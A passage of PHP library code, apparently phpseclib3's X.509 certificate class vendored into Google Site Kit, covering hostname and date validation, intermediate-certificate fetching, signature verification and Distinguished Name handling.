'[^.]*', $value); switch ($key) { case 'dNSName': /* From RFC2818 "HTTP over TLS": If a subjectAltName extension of type dNSName is present, that MUST be used as the identity. Otherwise, the (most specific) Common Name field in the Subject field of the certificate MUST be used. Although the use of the Common Name is existing practice, it is deprecated and Certification Authorities are encouraged to use the dNSName instead. */ if (\preg_match('#^' . $value . '$#', $components['host'])) { return \true; } break; case 'iPAddress': /* From RFC2818 "HTTP over TLS": In some cases, the URI is specified as an IP address rather than a hostname. In this case, the iPAddress subjectAltName must be present in the certificate and must exactly match the IP in the URI. */ if (\preg_match('#(?:\\d{1-3}\\.){4}#', $components['host'] . '.') && \preg_match('#^' . $value . '$#', $components['host'])) { return \true; } } } } return \false; } if ($value = $this->getDNProp('id-at-commonName')) { $value = \str_replace(['.', '*'], ['\\.', '[^.]*'], $value[0]); return \preg_match('#^' . $value . '$#', $components['host']) === 1; } return \false; } /** * Validate a date * * If $date isn't defined it is assumed to be the current date. * * @param \DateTimeInterface|string $date optional * @return bool */ public function validateDate($date = null) { if (!\is_array($this->currentCert) || !isset($this->currentCert['tbsCertificate'])) { return \false; } if (!isset($date)) { $date = new \DateTimeImmutable('now', new \DateTimeZone(@\date_default_timezone_get())); } $notBefore = $this->currentCert['tbsCertificate']['validity']['notBefore']; $notBefore = isset($notBefore['generalTime']) ? $notBefore['generalTime'] : $notBefore['utcTime']; $notAfter = $this->currentCert['tbsCertificate']['validity']['notAfter']; $notAfter = isset($notAfter['generalTime']) ? $notAfter['generalTime'] : $notAfter['utcTime']; if (\is_string($date)) { $date = new \DateTimeImmutable($date, new \DateTimeZone(@\date_default_timezone_get())); } $notBefore = new \DateTimeImmutable($notBefore, new \DateTimeZone(@\date_default_timezone_get())); $notAfter = new \DateTimeImmutable($notAfter, new \DateTimeZone(@\date_default_timezone_get())); return $date >= $notBefore && $date <= $notAfter; } /** * Fetches a URL * * @param string $url * @return bool|string */ private static function fetchURL($url) { if (self::$disable_url_fetch) { return \false; } $parts = \parse_url($url); $data = ''; switch ($parts['scheme']) { case 'http': $fsock = @\fsockopen($parts['host'], isset($parts['port']) ? $parts['port'] : 80); if (!$fsock) { return \false; } $path = $parts['path']; if (isset($parts['query'])) { $path .= '?' . $parts['query']; } \fputs($fsock, "GET {$path} HTTP/1.0\r\n"); \fputs($fsock, "Host: {$parts['host']}\r\n\r\n"); $line = \fgets($fsock, 1024); if (\strlen($line) < 3) { return \false; } \preg_match('#HTTP/1.\\d (\\d{3})#', $line, $temp); if ($temp[1] != '200') { return \false; } // skip the rest of the headers in the http response while (!\feof($fsock) && \fgets($fsock, 1024) != "\r\n") { } while (!\feof($fsock)) { $temp = \fread($fsock, 1024); if ($temp === \false) { return \false; } $data .= $temp; } break; } return $data; } /** * Validates an intermediate cert as identified via authority info access extension * * See https://tools.ietf.org/html/rfc4325 for more info * * @param bool $caonly * @param int $count * @return bool */ private function testForIntermediate($caonly, $count) { $opts = $this->getExtension('id-pe-authorityInfoAccess'); if (!\is_array($opts)) { return \false; } foreach ($opts as $opt) { if ($opt['accessMethod'] == 'id-ad-caIssuers') { // accessLocation is a GeneralName. GeneralName fields support stuff like email addresses, IP addresses, LDAP, // etc, but we're only supporting URI's. URI's and LDAP are the only thing https://tools.ietf.org/html/rfc4325 // discusses if (isset($opt['accessLocation']['uniformResourceIdentifier'])) { $url = $opt['accessLocation']['uniformResourceIdentifier']; break; } } } if (!isset($url)) { return \false; } $cert = static::fetchURL($url); if (!\is_string($cert)) { return \false; } $parent = new static(); $parent->CAs = $this->CAs; /* "Conforming applications that support HTTP or FTP for accessing certificates MUST be able to accept .cer files and SHOULD be able to accept .p7c files." -- https://tools.ietf.org/html/rfc4325 A .p7c file is 'a "certs-only" CMS message as specified in RFC 2797" These are currently unsupported */ if (!\is_array($parent->loadX509($cert))) { return \false; } if (!$parent->validateSignatureCountable($caonly, ++$count)) { return \false; } $this->CAs[] = $parent->currentCert; //$this->loadCA($cert); return \true; } /** * Validate a signature * * Works on X.509 certs, CSR's and CRL's. * Returns true if the signature is verified, false if it is not correct or null on error * * By default returns false for self-signed certs. Call validateSignature(false) to make this support * self-signed. * * The behavior of this function is inspired by {@link http://php.net/openssl-verify openssl_verify}. * * @param bool $caonly optional * @return mixed */ public function validateSignature($caonly = \true) { return $this->validateSignatureCountable($caonly, 0); } /** * Validate a signature * * Performs said validation whilst keeping track of how many times validation method is called * * @param bool $caonly * @param int $count * @return mixed */ private function validateSignatureCountable($caonly, $count) { if (!\is_array($this->currentCert) || !isset($this->signatureSubject)) { return null; } if ($count == self::$recur_limit) { return \false; } /* TODO: "emailAddress attribute values are not case-sensitive (e.g., "subscriber@example.com" is the same as "SUBSCRIBER@EXAMPLE.COM")." -- http://tools.ietf.org/html/rfc5280#section-4.1.2.6 implement pathLenConstraint in the id-ce-basicConstraints extension */ switch (\true) { case isset($this->currentCert['tbsCertificate']): // self-signed cert switch (\true) { case !\defined('Google\\Site_Kit_Dependencies\\FILE_X509_IGNORE_TYPE') && $this->currentCert['tbsCertificate']['issuer'] === $this->currentCert['tbsCertificate']['subject']: case \defined('Google\\Site_Kit_Dependencies\\FILE_X509_IGNORE_TYPE') && $this->getIssuerDN(self::DN_STRING) === $this->getDN(self::DN_STRING): $authorityKey = $this->getExtension('id-ce-authorityKeyIdentifier'); $subjectKeyID = $this->getExtension('id-ce-subjectKeyIdentifier'); switch (\true) { case !\is_array($authorityKey): case !$subjectKeyID: case isset($authorityKey['keyIdentifier']) && $authorityKey['keyIdentifier'] === $subjectKeyID: $signingCert = $this->currentCert; } } if (!empty($this->CAs)) { for ($i = 0; $i < \count($this->CAs); $i++) { // even if the cert is a self-signed one we still want to see if it's a CA; // if not, we'll conditionally return an error $ca = $this->CAs[$i]; switch (\true) { case !\defined('Google\\Site_Kit_Dependencies\\FILE_X509_IGNORE_TYPE') && $this->currentCert['tbsCertificate']['issuer'] === $ca['tbsCertificate']['subject']: case \defined('Google\\Site_Kit_Dependencies\\FILE_X509_IGNORE_TYPE') && $this->getDN(self::DN_STRING, $this->currentCert['tbsCertificate']['issuer']) === $this->getDN(self::DN_STRING, $ca['tbsCertificate']['subject']): $authorityKey = $this->getExtension('id-ce-authorityKeyIdentifier'); $subjectKeyID = $this->getExtension('id-ce-subjectKeyIdentifier', $ca); switch (\true) { case !\is_array($authorityKey): case !$subjectKeyID: case isset($authorityKey['keyIdentifier']) && $authorityKey['keyIdentifier'] === $subjectKeyID: if (\is_array($authorityKey) && isset($authorityKey['authorityCertSerialNumber']) && !$authorityKey['authorityCertSerialNumber']->equals($ca['tbsCertificate']['serialNumber'])) { break 2; // serial mismatch - check other ca } $signingCert = $ca; // working cert break 3; } } } if (\count($this->CAs) == $i && $caonly) { return $this->testForIntermediate($caonly, $count) && $this->validateSignature($caonly); } } elseif (!isset($signingCert) || $caonly) { return $this->testForIntermediate($caonly, $count) && $this->validateSignature($caonly); } return $this->validateSignatureHelper($signingCert['tbsCertificate']['subjectPublicKeyInfo']['algorithm']['algorithm'], $signingCert['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'], $this->currentCert['signatureAlgorithm']['algorithm'], \substr($this->currentCert['signature'], 1), $this->signatureSubject); case isset($this->currentCert['certificationRequestInfo']): return $this->validateSignatureHelper($this->currentCert['certificationRequestInfo']['subjectPKInfo']['algorithm']['algorithm'], $this->currentCert['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey'], $this->currentCert['signatureAlgorithm']['algorithm'], \substr($this->currentCert['signature'], 1), $this->signatureSubject); case isset($this->currentCert['publicKeyAndChallenge']): return $this->validateSignatureHelper($this->currentCert['publicKeyAndChallenge']['spki']['algorithm']['algorithm'], $this->currentCert['publicKeyAndChallenge']['spki']['subjectPublicKey'], $this->currentCert['signatureAlgorithm']['algorithm'], \substr($this->currentCert['signature'], 1), $this->signatureSubject); case isset($this->currentCert['tbsCertList']): if (!empty($this->CAs)) { for ($i = 0; $i < \count($this->CAs); $i++) { $ca = $this->CAs[$i]; switch (\true) { case !\defined('Google\\Site_Kit_Dependencies\\FILE_X509_IGNORE_TYPE') && $this->currentCert['tbsCertList']['issuer'] === $ca['tbsCertificate']['subject']: case \defined('Google\\Site_Kit_Dependencies\\FILE_X509_IGNORE_TYPE') && $this->getDN(self::DN_STRING, $this->currentCert['tbsCertList']['issuer']) === $this->getDN(self::DN_STRING, $ca['tbsCertificate']['subject']): $authorityKey = $this->getExtension('id-ce-authorityKeyIdentifier'); $subjectKeyID = $this->getExtension('id-ce-subjectKeyIdentifier', $ca); switch (\true) { case !\is_array($authorityKey): case !$subjectKeyID: case isset($authorityKey['keyIdentifier']) && $authorityKey['keyIdentifier'] === $subjectKeyID: if (\is_array($authorityKey) && isset($authorityKey['authorityCertSerialNumber']) && !$authorityKey['authorityCertSerialNumber']->equals($ca['tbsCertificate']['serialNumber'])) { break 2; // serial mismatch - check other ca } $signingCert = $ca; // working cert break 3; } } } } if (!isset($signingCert)) { return \false; } return $this->validateSignatureHelper($signingCert['tbsCertificate']['subjectPublicKeyInfo']['algorithm']['algorithm'], $signingCert['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'], $this->currentCert['signatureAlgorithm']['algorithm'], \substr($this->currentCert['signature'], 1), $this->signatureSubject); default: return \false; } } /** * Validates a signature * * Returns true if the signature is verified and false if it is not correct. * If the algorithms are unsupposed an exception is thrown. * * @param string $publicKeyAlgorithm * @param string $publicKey * @param string $signatureAlgorithm * @param string $signature * @param string $signatureSubject * @throws UnsupportedAlgorithmException if the algorithm is unsupported * @return bool */ private function validateSignatureHelper($publicKeyAlgorithm, $publicKey, $signatureAlgorithm, $signature, $signatureSubject) { switch ($publicKeyAlgorithm) { case 'id-RSASSA-PSS': $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::loadFormat('PSS', $publicKey); break; case 'rsaEncryption': $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::loadFormat('PKCS8', $publicKey); switch ($signatureAlgorithm) { case 'id-RSASSA-PSS': break; case 'md2WithRSAEncryption': case 'md5WithRSAEncryption': case 'sha1WithRSAEncryption': case 'sha224WithRSAEncryption': case 'sha256WithRSAEncryption': case 'sha384WithRSAEncryption': case 'sha512WithRSAEncryption': $key = $key->withHash(\preg_replace('#WithRSAEncryption$#', '', $signatureAlgorithm))->withPadding(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_PKCS1); break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Signature algorithm unsupported'); } break; case 'id-Ed25519': case 'id-Ed448': $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::loadFormat('PKCS8', $publicKey); break; case 'id-ecPublicKey': $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::loadFormat('PKCS8', $publicKey); switch ($signatureAlgorithm) { case 'ecdsa-with-SHA1': case 'ecdsa-with-SHA224': case 'ecdsa-with-SHA256': case 'ecdsa-with-SHA384': case 'ecdsa-with-SHA512': $key = $key->withHash(\preg_replace('#^ecdsa-with-#', '', \strtolower($signatureAlgorithm))); break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Signature algorithm unsupported'); } break; case 'id-dsa': $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA::loadFormat('PKCS8', $publicKey); switch ($signatureAlgorithm) { case 'id-dsa-with-sha1': case 'id-dsa-with-sha224': case 'id-dsa-with-sha256': $key = $key->withHash(\preg_replace('#^id-dsa-with-#', '', \strtolower($signatureAlgorithm))); break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Signature algorithm unsupported'); } break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Public key algorithm unsupported'); } return $key->verify($signatureSubject, $signature); } /** * Sets the recursion limit * * When validating a signature it may be necessary to download intermediate certs from URI's. * An intermediate cert that linked to itself would result in an infinite loop so to prevent * that we set a recursion limit. A negative number means that there is no recursion limit. * * @param int $count */ public static function setRecurLimit($count) { self::$recur_limit = $count; } /** * Prevents URIs from being automatically retrieved * */ public static function disableURLFetch() { self::$disable_url_fetch = \true; } /** * Allows URIs to be automatically retrieved * */ public static function enableURLFetch() { self::$disable_url_fetch = \false; } /** * Decodes an IP address * * Takes in a base64 encoded "blob" and returns a human readable IP address * * @param string $ip * @return string */ public static function decodeIP($ip) { return \inet_ntop($ip); } /** * Decodes an IP address in a name constraints extension * * Takes in a base64 encoded "blob" and returns a human readable IP address / mask * * @param string $ip * @return array */ public static function decodeNameConstraintIP($ip) { $size = \strlen($ip) >> 1; $mask = \substr($ip, $size); $ip = \substr($ip, 0, $size); return [\inet_ntop($ip), \inet_ntop($mask)]; } /** * Encodes an IP address * * Takes a human readable IP address into a base64-encoded "blob" * * @param string|array $ip * @return string */ public static function encodeIP($ip) { return \is_string($ip) ? \inet_pton($ip) : \inet_pton($ip[0]) . \inet_pton($ip[1]); } /** * "Normalizes" a Distinguished Name property * * @param string $propName * @return mixed */ private function translateDNProp($propName) { switch (\strtolower($propName)) { case 'jurisdictionofincorporationcountryname': case 'jurisdictioncountryname': case 'jurisdictionc': return 'jurisdictionOfIncorporationCountryName'; case 'jurisdictionofincorporationstateorprovincename': case 'jurisdictionstateorprovincename': case 'jurisdictionst': return 'jurisdictionOfIncorporationStateOrProvinceName'; case 'jurisdictionlocalityname': case 'jurisdictionl': return 'jurisdictionLocalityName'; case 'id-at-businesscategory': case 'businesscategory': return 'id-at-businessCategory'; case 'id-at-countryname': case 'countryname': case 'c': return 'id-at-countryName'; case 'id-at-organizationname': case 'organizationname': case 'o': return 'id-at-organizationName'; case 'id-at-dnqualifier': case 'dnqualifier': return 'id-at-dnQualifier'; case 'id-at-commonname': case 'commonname': case 'cn': return 'id-at-commonName'; case 'id-at-stateorprovincename': case 'stateorprovincename': case 'state': case 'province': case 'provincename': case 'st': return 'id-at-stateOrProvinceName'; case 'id-at-localityname': case 'localityname': case 'l': return 'id-at-localityName'; case 'id-emailaddress': case 'emailaddress': return 'pkcs-9-at-emailAddress'; case 'id-at-serialnumber': case 'serialnumber': return 'id-at-serialNumber'; case 'id-at-postalcode': case 'postalcode': return 'id-at-postalCode'; case 'id-at-streetaddress': case 'streetaddress': return 'id-at-streetAddress'; case 'id-at-name': case 'name': return 'id-at-name'; case 'id-at-givenname': case 'givenname': return 'id-at-givenName'; case 'id-at-surname': case 'surname': case 'sn': return 'id-at-surname'; case 'id-at-initials': case 'initials': return 'id-at-initials'; case 'id-at-generationqualifier': case 'generationqualifier': return 'id-at-generationQualifier'; case 'id-at-organizationalunitname': case 'organizationalunitname': case 'ou': return 'id-at-organizationalUnitName'; case 'id-at-pseudonym': case 'pseudonym': return 'id-at-pseudonym'; case 'id-at-title': case 'title': return 'id-at-title'; case 'id-at-description': case 'description': return 'id-at-description'; case 'id-at-role': case 'role': return 'id-at-role'; case 'id-at-uniqueidentifier': case 'uniqueidentifier': case 'x500uniqueidentifier': return 'id-at-uniqueIdentifier'; case 'postaladdress': case 'id-at-postaladdress': return 'id-at-postalAddress'; default: return \false; } } /** * Set a Distinguished Name property * * @param string $propName * @param mixed $propValue * @param string $type optional * @return bool */ public function setDNProp($propName, $propValue, $type = 'utf8String') { if (empty($this->dn)) { $this->dn = ['rdnSequence' => []]; } if (($propName = $this->translateDNProp($propName)) === \false) { return \false; } foreach ((array) $propValue as $v) { if (!\is_array($v) && isset($type)) { $v = [$type => $v]; } $this->dn['rdnSequence'][] = [['type' => $propName, 'value' => $v]]; } return \true; } /** * Remove Distinguished Name properties * * @param string $propName */ public function removeDNProp($propName) { if (empty($this->dn)) { return; } if (($propName = $this->translateDNProp($propName)) === \false) { return; } $dn =& $this->dn['rdnSequence']; $size = \count($dn); for ($i = 0; $i < $size; $i++) { if ($dn[$i][0]['type'] == $propName) { unset($dn[$i]); } } $dn = \array_values($dn); // fix for https://bugs.php.net/75433 affecting PHP 7.2 if (!isset($dn[0])) { $dn = \array_splice($dn, 0, 0); } } /** * Get Distinguished Name properties * * @param string $propName * @param array $dn optional * @param bool $withType optional * @return mixed */ public function getDNProp($propName, $dn = null, $withType = \false) { if (!isset($dn)) { $dn = $this->dn; } if (empty($dn)) { return \false; } if (($propName = $this->translateDNProp($propName)) === \false) { return \false; } $filters = []; $filters['value'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::setFilters($filters); $this->mapOutDNs($dn, 'rdnSequence'); $dn = $dn['rdnSequence']; $result = []; for ($i = 0; $i < \count($dn); $i++) { if ($dn[$i][0]['type'] == $propName) { $v = $dn[$i][0]['value']; if (!$withType) { if (\is_array($v)) { foreach ($v as $type => $s) { $type = \array_search($type, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::ANY_MAP); if ($type !== \false && \array_key_exists($type, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::STRING_TYPE_SIZE)) { $s = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::convert($s, $type); if ($s !== \false) { $v = $s; break; } } } if (\is_array($v)) { $v = \array_pop($v); // Always strip data type. } } elseif (\is_object($v) && $v instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element) { $map = $this->getMapping($propName); if (!\is_bool($map)) { $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($v); if (!$decoded) { return \false; } $v = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], $map); } } } $result[] = $v; } } return $result; } /** * Set a Distinguished Name * * @param mixed $dn * @param bool $merge optional * @param string $type optional * @return bool */ public function setDN($dn, $merge = \false, $type = 'utf8String') { if (!$merge) { $this->dn = null; } if (\is_array($dn)) { if (isset($dn['rdnSequence'])) { $this->dn = $dn; // No merge here. return \true; } // handles stuff generated by openssl_x509_parse() foreach ($dn as $prop => $value) { if (!$this->setDNProp($prop, $value, $type)) { return \false; } } return \true; } // handles everything else $results = \preg_split('#((?:^|, *|/)(?:C=|O=|OU=|CN=|L=|ST=|SN=|postalCode=|streetAddress=|emailAddress=|serialNumber=|organizationalUnitName=|title=|description=|role=|x500UniqueIdentifier=|postalAddress=))#', $dn, -1, \PREG_SPLIT_DELIM_CAPTURE); for ($i = 1; $i < \count($results); $i += 2) { $prop = \trim($results[$i], ', =/'); $value = $results[$i + 1]; if (!$this->setDNProp($prop, $value, $type)) { return \false; } } return \true; } /** * Get the Distinguished Name for a certificates subject * * @param mixed $format optional * @param array $dn optional * @return array|bool|string */ public function getDN($format = self::DN_ARRAY, $dn = null) { if (!isset($dn)) { $dn = isset($this->currentCert['tbsCertList']) ? $this->currentCert['tbsCertList']['issuer'] : $this->dn; } switch ((int) $format) { case self::DN_ARRAY: return $dn; case self::DN_ASN1: $filters = []; $filters['rdnSequence']['value'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::setFilters($filters); $this->mapOutDNs($dn, 'rdnSequence'); return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($dn, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Name::MAP); case self::DN_CANON: // No SEQUENCE around RDNs and all string values normalized as // trimmed lowercase UTF-8 with all spacing as one blank. // constructed RDNs will not be canonicalized $filters = []; $filters['value'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::setFilters($filters); $result = ''; $this->mapOutDNs($dn, 'rdnSequence'); foreach ($dn['rdnSequence'] as $rdn) { foreach ($rdn as $i => $attr) { $attr =& $rdn[$i]; if (\is_array($attr['value'])) { foreach ($attr['value'] as $type => $v) { $type = \array_search($type, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::ANY_MAP, \true); if ($type !== \false && \array_key_exists($type, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::STRING_TYPE_SIZE)) { $v = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::convert($v, $type); if ($v !== \false) { $v = \preg_replace('/\\s+/', ' ', $v); $attr['value'] = \strtolower(\trim($v)); break; } } } } } $result .= \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($rdn, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RelativeDistinguishedName::MAP); } return $result; case self::DN_HASH: $dn = $this->getDN(self::DN_CANON, $dn); $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha1'); $hash = $hash->hash($dn); \extract(\unpack('Vhash', $hash)); return \strtolower(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex(\pack('N', $hash))); } // Default is to return a string. $start = \true; $output = ''; $result = []; $filters = []; $filters['rdnSequence']['value'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::setFilters($filters); $this->mapOutDNs($dn, 'rdnSequence'); foreach ($dn['rdnSequence'] as $field) { $prop = $field[0]['type']; $value = $field[0]['value']; $delim = ', '; switch ($prop) { case 'id-at-countryName': $desc = 'C'; break; case 'id-at-stateOrProvinceName': $desc = 'ST'; break; case 'id-at-organizationName': $desc = 'O'; break; case 'id-at-organizationalUnitName': $desc = 'OU'; break; case 'id-at-commonName': $desc = 'CN'; break; case 'id-at-localityName': $desc = 'L'; break; case 'id-at-surname': $desc = 'SN'; break; case 'id-at-uniqueIdentifier': $delim = '/'; $desc = 'x500UniqueIdentifier'; break; case 'id-at-postalAddress': $delim = '/'; $desc = 'postalAddress'; break; default: $delim = '/'; $desc = \preg_replace('#.+-([^-]+)$#', '$1', $prop); } if (!$start) { $output .= $delim; } if (\is_array($value)) { foreach ($value as $type => $v) { $type = \array_search($type, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::ANY_MAP, \true); if ($type !== \false && \array_key_exists($type, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::STRING_TYPE_SIZE)) { $v = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::convert($v, $type); if ($v !== \false) { $value = $v; break; } } } if (\is_array($value)) { $value = \array_pop($value); // Always strip data type. } } elseif (\is_object($value) && $value instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element) { $callback = function ($x) { return '\\x' . \bin2hex($x[0]); }; $value = \strtoupper(\preg_replace_callback('#[^\\x20-\\x7E]#', $callback, $value->element)); } $output .= $desc . '=' . $value; $result[$desc] = isset($result[$desc]) ? \array_merge((array) $result[$desc], [$value]) : $value; $start = \false; } return $format == self::DN_OPENSSL ? $result : $output; } /** * Get the Distinguished Name for a certificate/crl issuer * * @param int $format optional * @return mixed */ public function getIssuerDN($format = self::DN_ARRAY) { switch (\true) { case !isset($this->currentCert) || !\is_array($this->currentCert): break; case isset($this->currentCert['tbsCertificate']): return $this->getDN($format, $this->currentCert['tbsCertificate']['issuer']); case isset($this->currentCert['tbsCertList']): return $this->getDN($format, $this->currentCert['tbsCertList']['issuer']); } return \false; } /** * Get the Distinguished Name for a certificate/csr subject * Alias of getDN() * * @param int $format optional * @return mixed */ public function getSubjectDN($format = self::DN_ARRAY) { switch (\true) { case !empty($this->dn): return $this->getDN($format); case !isset($this->currentCert) || !\is_array($this->currentCert): break; case isset($this->currentCert['tbsCertificate']): return $this->getDN($format, $this->currentCert['tbsCertificate']['subject']); case isset($this->currentCert['certificationRequestInfo']): return $this->getDN($format, $this->currentCert['certificationRequestInfo']['subject']); } return \false; } /** * Get an individual Distinguished Name property for a certificate/crl issuer * * @param string $propName * @param bool $withType optional * @return mixed */ public function getIssuerDNProp($propName, $withType = \false) { switch (\true) { case !isset($this->currentCert) || !\is_array($this->currentCert): break; case isset($this->currentCert['tbsCertificate']): return $this->getDNProp($propName, $this->currentCert['tbsCertificate']['issuer'], $withType); case isset($this->currentCert['tbsCertList']): return $this->getDNProp($propName, $this->currentCert['tbsCertList']['issuer'], $withType); } return \false; } /** * Get an individual Distinguished Name property for a certificate/csr subject * * @param string $propName * @param bool $withType optional * @return mixed */ public function getSubjectDNProp($propName, $withType = \false) { switch (\true) { case !empty($this->dn): return $this->getDNProp($propName, null, $withType); case !isset($this->currentCert) || !\is_array($this->currentCert): break; case isset($this->currentCert['tbsCertificate']): return $this->getDNProp($propName, $this->currentCert['tbsCertificate']['subject'], $withType); case isset($this->currentCert['certificationRequestInfo']): return $this->getDNProp($propName, $this->currentCert['certificationRequestInfo']['subject'], $withType); } return \false; } /** * Get the certificate chain for the current cert * * @return mixed */ public function getChain() { $chain = [$this->currentCert]; if (!\is_array($this->currentCert) || !isset($this->currentCert['tbsCertificate'])) { return \false; } while (\true) { $currentCert = $chain[\count($chain) - 1]; for ($i = 0; $i < \count($this->CAs); $i++) { $ca = $this->CAs[$i]; if ($currentCert['tbsCertificate']['issuer'] === $ca['tbsCertificate']['subject']) { $authorityKey = $this->getExtension('id-ce-authorityKeyIdentifier', $currentCert); $subjectKeyID = $this->getExtension('id-ce-subjectKeyIdentifier', $ca); switch (\true) { case !\is_array($authorityKey): case \is_array($authorityKey) && isset($authorityKey['keyIdentifier']) && $authorityKey['keyIdentifier'] === $subjectKeyID: if ($currentCert === $ca) { break 3; } $chain[] = $ca; break 2; } } } if ($i == \count($this->CAs)) { break; } } foreach ($chain as $key => $value) { $chain[$key] = new \Google\Site_Kit_Dependencies\phpseclib3\File\X509(); $chain[$key]->loadX509($value); } return $chain; } /** * Returns the current cert * * @return array|bool */ public function &getCurrentCert() { return $this->currentCert; } /** * Set public key * * Key needs to be a \phpseclib3\Crypt\RSA object * * @param PublicKey $key * @return void */ public function setPublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey $key) { $this->publicKey = $key; } /** * Set private key * * Key needs to be a \phpseclib3\Crypt\RSA object * * @param PrivateKey $key */ public function setPrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey $key) { $this->privateKey = $key; } /** * Set challenge * * Used for SPKAC CSR's * * @param string $challenge */ public function setChallenge($challenge) { $this->challenge = $challenge; } /** * Gets the public key * * Returns a \phpseclib3\Crypt\RSA object or a false. * * @return mixed */ public function getPublicKey() { if (isset($this->publicKey)) { return $this->publicKey; } if (isset($this->currentCert) && \is_array($this->currentCert)) { $paths = ['tbsCertificate/subjectPublicKeyInfo', 'certificationRequestInfo/subjectPKInfo', 'publicKeyAndChallenge/spki']; foreach ($paths as $path) { $keyinfo = $this->subArray($this->currentCert, $path); if (!empty($keyinfo)) { break; } } } if (empty($keyinfo)) { return \false; } $key = $keyinfo['subjectPublicKey']; switch ($keyinfo['algorithm']['algorithm']) { case 'id-RSASSA-PSS': return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::loadFormat('PSS', $key); case 'rsaEncryption': return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::loadFormat('PKCS8', $key)->withPadding(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_PKCS1); case 'id-ecPublicKey': case 'id-Ed25519': case 'id-Ed448': return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::loadFormat('PKCS8', $key); case 'id-dsa': return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA::loadFormat('PKCS8', $key); } return \false; } /** * Load a Certificate Signing Request * * @param string $csr * @param int $mode * @return mixed */ public function loadCSR($csr, $mode = self::FORMAT_AUTO_DETECT) { if (\is_array($csr) && isset($csr['certificationRequestInfo'])) { unset($this->currentCert); unset($this->currentKeyIdentifier); unset($this->signatureSubject); $this->dn = $csr['certificationRequestInfo']['subject']; if (!isset($this->dn)) { return \false; } $this->currentCert = $csr; return $csr; } // see http://tools.ietf.org/html/rfc2986 if ($mode != self::FORMAT_DER) { $newcsr = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($csr); if ($mode == self::FORMAT_PEM && $csr == $newcsr) { return \false; } $csr = $newcsr; } $orig = $csr; if ($csr === \false) { $this->currentCert = \false; return \false; } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($csr); if (!$decoded) { $this->currentCert = \false; return \false; } $csr = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificationRequest::MAP); if (!isset($csr) || $csr === \false) { $this->currentCert = \false; return \false; } $this->mapInAttributes($csr, 'certificationRequestInfo/attributes'); $this->mapInDNs($csr, 'certificationRequestInfo/subject/rdnSequence'); $this->dn = $csr['certificationRequestInfo']['subject']; $this->signatureSubject = \substr($orig, $decoded[0]['content'][0]['start'], $decoded[0]['content'][0]['length']); $key = $csr['certificationRequestInfo']['subjectPKInfo']; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectPublicKeyInfo::MAP); $csr['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey'] = "-----BEGIN PUBLIC KEY-----\r\n" . \chunk_split(\base64_encode($key), 64) . "-----END PUBLIC KEY-----"; $this->currentKeyIdentifier = null; $this->currentCert = $csr; $this->publicKey = null; $this->publicKey = $this->getPublicKey(); return $csr; } /** * Save CSR request * * @param array $csr * @param int $format optional * @return string */ public function saveCSR(array $csr, $format = self::FORMAT_PEM) { if (!\is_array($csr) || !isset($csr['certificationRequestInfo'])) { return \false; } switch (\true) { case 